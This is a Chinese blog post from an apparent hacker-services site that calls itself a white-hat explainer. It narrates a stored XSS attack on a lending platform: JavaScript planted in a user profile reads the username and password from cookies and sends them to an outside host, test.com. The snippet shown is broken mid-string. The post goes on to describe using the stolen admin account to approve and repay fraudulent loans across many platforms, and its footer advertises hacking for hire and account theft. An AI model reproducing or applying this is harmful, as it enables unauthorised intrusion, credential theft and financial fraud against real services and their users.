黑客意志

白帽子们是如何发现网站漏洞的?-渗透技术爱好者的回答:白帽子是如何发现网站漏洞的?讲到漏洞,这里面,…

白帽子们是如何发现网站漏洞的?
渗透技术爱好者的回答

白帽子是如何发现网站漏洞的?讲到漏洞,这里面,我们不得不提一下黑客,

黑客分为两种:

一种是可以自己研发对应的漏洞探测工具,这种黑客的话水平会比较高,基本都会市面上流行的开发工具(C,C++,python,java,有一定的汇编知识)

还有一种就是只会用别人的工具,通过工具去探测对应的漏洞,一群人能发现的都是一些古老的漏洞,对于比较新的漏洞,因为不会写工具,所以一般很难去发现,只能等工具的作者去更新,才能用新的工具去扫描并发现漏洞。

对于专门的安全公司,他们都是自己有一定的内部自己写的工具,再配合市面名气比较大的工具,混合搭配使用,大部分的平台,都会针对市面上公开的工具的扫描特别进行回避,加固,所以你要真正去发现网站漏洞,还是得有一定的自己开发工具进行配合 ,不然永远是无法做到真正意义上的白帽子。

在这里插入一个网友的真实经历。

我认识的这个互联网的朋友,他是一个套路贷的受害者,

他说他一时经济困难,不好意思向朋友开口借,因为他在外地做生意,大家都感觉他在外面赚了大钱,面子上过不去,人活着就是为了个面子,

在网贷平台上面贷款了20000块钱(这个网贷平台已经被取缔了),

后来各种各样的套路,从20000块钱一直滚,滚到了200多万,他的人生跌入了深渊 ,店铺当了,也不足以弥补这个窟窿。

关于什么是套路贷,这里面的我就不详细的去讲,但是这个套路贷伤害是非常非常巨大的,一旦被套中,后果也是非常的严重,各种方式进行折磨,比如说打电话,威胁家里人,在精神上饱受摧残之后,他都有想寻短见的念头,她的家人和朋友都知道了这件事情,当然面子肯定是没有了,

那年套路贷很火,国家在这方面的监控还是很薄弱,他去寻求正规渠道解决问题,因为案情复杂,

最后都没有给他很好的解决,后来他找到我,因为以前我们在其他方面,有过合作,把这个事和我说了下 ,

听到他的诉苦,我给他的建议

让他别自寻短见,毕竟为了这点钱,把命搭进去不划算。

面子这个我让他放下去,也没有什么面子了,全村人都知道了,以前牛逼吹上天了,现在老老实实的做会正常的自我。

他还特别问我 ,能不能找到这个公司的真正幕后老板的身份证信息,如果有这个信息,他就可以寻求警方的帮助。这个让我确实很为难,我当时就安慰他尽力而为。

晚上10点多我一直没睡,他这个事太揪心了,能帮还是帮下他,但是这个也是看运气,我先尝试看看能否通过技术层面上去帮助他。这次我当了一会白帽子 ,

也是我第一次免费帮别人做白帽子,首先用工具,先用SQl注入工具,进行探测,

但是很遗憾,这个网站是没有注入点,有时候我们做渗透测试,不仅要看技术,还得看运气,

并不是说每个站点都是会有某个特定的漏洞,但是漏洞探测多了。总有那么几个点可以突破,

如果到最后实在是没有办法,那就只能放弃了。

本着不放弃的精神,继续去操作下去 ,这次用了XSS跨站漏洞测试,没想到这个二货网贷平台,

竟然存在XSS跨站漏洞,不知道是技术不小心还是技术人员故意放的漏洞,方便自己去捞老板的外快。

那么大家可能会非常的奇怪,技术人员放一个漏洞,不会被发现啊,万一被老板发现了不得死翘翘,这里面我举个简单的例子

假设我们在保存数据,比如客户资料进入数据库的时候 ,假设这个这个客户的名称叫做

张三

那么如果我们不对字符进行处理, 直接客户填写什么,我们就保存什么 ,假设插入语句为

insert into db_user(“张三”)

这个语句在编程界没有人会去怀疑,也没有人敢说他有错,但是在一定的条件下,比如动态生成页面的时候,如果字符没有进行特别处理,就会存在漏洞,

如果做字符串过滤处理,比如进行URLEncode 编码,则不会造成漏洞,也就是多一句代码的事 ,但是有时候编程技术人员不小心,所以漏洞这个东西很难说存在不存在,就看运气,

下面我们回到主题,这里面我大概说下思路

在提交用户资料哪里做了下 测试 ,输入 下测试语句,竟然能弹出一个对话框,说明存在跨站漏洞,太兴奋了,

如果是一个专业的白帽子,肯定有自己写对应的XSS跨站漏洞检测工具,这个难么??

如果你是一名编程开发者,你可能不懂,不是你不会写,而是你专注着上班,除了上班以外的东西你不关心,其实我们很多人认为白帽子很厉害,比一般的上班的厉害,其实他们和其他编程的一样

只不过他们的关注领域不一样而已,一般的编程开发的转化到白帽子是很简单的,只需要平时自己多去注意下安全方面的问题即可。

这里面由于篇幅关系,不一一的写细节,

详细的测试过程,有兴趣可以加 联盟资源,搜索这个公众号,

有对应的实战测试视频,通过这个视频,你可以学会很贱的XSS漏洞测试技巧,更多的学习资料

也是免费赠送 ,对技术比较感兴趣的可以联系

转回正题,确认这个网站存在跨站漏洞后,我找那个网友,要了他的账号和密码

登录他的账户,里面的贷款金额,催帐记录不忍直视 ,不过这个不是我的重点,我在他的个人详细资料里面 ,点击编辑

写入实现准备好的代码 ,代码很简单,就是或是到Cookie 里面的用户名和密码 。

var username=CookieHelper.getCookie(‘username’).value;

var password=CookieHelper.getCookie(‘password’).value;

var script =document.createElement(‘script’);

script.src=’test.com/index.php?

document.body.appendChild(script);

分别获取到当前登录的用户名和密码 ,然后提交到指定的服务器 ,然后提交

当然真实的不是这样写的,这里只是做一个测试,真实的 ,会把本地用户名和密码提交到指定的服务器 ,这个技术机密不透露 ,

大概思路就是在个人资料里面埋伏一个XSS脚本,保存提交给网贷平台服务器,

然后只要管理员打开我那个网友的账号,查看对应的详细的资料,就会把他的用户名和密码传到指定的服务器。

所有的都准备妥当后,我让那个朋友不要着急,接下来就等待他们管理员登录,然后查看他的资料,

一边也叫他催那些网贷工作人员,看他的资料,说资料上的信息有问题 ,核对上了就交款,

耐心等待了几天,远程服务器上面终于看到了 对应的管理员的用户名和密码 。

很多人可能会说 ,拿到这个管理员用户名和密码 有什么用???

这里面用处可大了,放款,还款,简单的来说 ,就是用不同的身份证,银行卡,

申请贷款,通过管理员账号同意通过,然后财务放款 ,过几天就用管理员帐户进行还款,

这些操作一般做不了多久,几天就被发现封了,不过没有关系,一般一个平台搞几万到几十万,

看情况,然后到处转战各种平台即可,

那个朋友因为也有大量的网贷平台,而且基本很多都是一个固定的模板,一个有漏洞,那么就是批量的存在漏洞,至于后续如何,这里就不透露了,基本完美的解决了

对于白帽子来说,寻找网站漏洞的方法,就是把最原始手工怎么操作,然后写成工具,

对于小白来说,就是尽可能的寻找更多的牛逼工具,会用工具即可,

拿到漏洞后做什么??这个自己想,但是千万别去做什么违法的事 !

赞(0)
分享到: 更多 (0)

黑客技术,黑客教程,黑客软件,黑客入门,黑客工具,黑客平台,黑客下单,渗透测试,CTF,菠菜,源码,暗网,安卓,物联网安全,网络安全周,国家安全,企业安全,盗QQ号,正规黑客,接单黑客,SRC测试,黑客修改,黑客交流,黑客追款,APP渗透,黑客系统

联系我们联系我们